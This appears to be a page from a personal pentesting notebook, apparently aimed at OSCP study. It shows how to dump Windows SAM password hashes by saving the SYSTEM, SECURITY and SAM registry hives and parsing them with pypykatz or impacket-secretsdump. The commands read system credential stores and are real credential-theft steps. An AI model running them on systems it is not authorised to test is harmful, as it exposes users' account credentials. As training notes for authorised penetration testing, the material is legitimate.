yuyudhn's notes
  • About
  • πŸš‰QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • β›ˆοΈMisc
  • πŸͺŸActive Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • πŸ“³Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • πŸ•ΈοΈWeb Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • πŸ–ŠοΈMachine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page

Was this helpful?

  1. MITRE ATT&CK
  2. Credential Access

Dump SAM Hashes via Registry

Assume you are already have NT SYSTEM or Administrator access on system. Or, you have Backup Operator role.

reg save hklm\system system.oscp
reg save hklm\security security.oscp
reg save hklm\sam sam.oscp

Download the file to attacker machine, and get the hash value using pypykayz.

pypykatz registry system.oscp --sam sam.oscp --security security.oscp

Or use secretsdump.

impacket-secretsdump -sam sam.oscp -security security.oscp -system system.oscp LOCAL
PreviousCredential AccessNextMisc

Last updated 7 months ago

Was this helpful?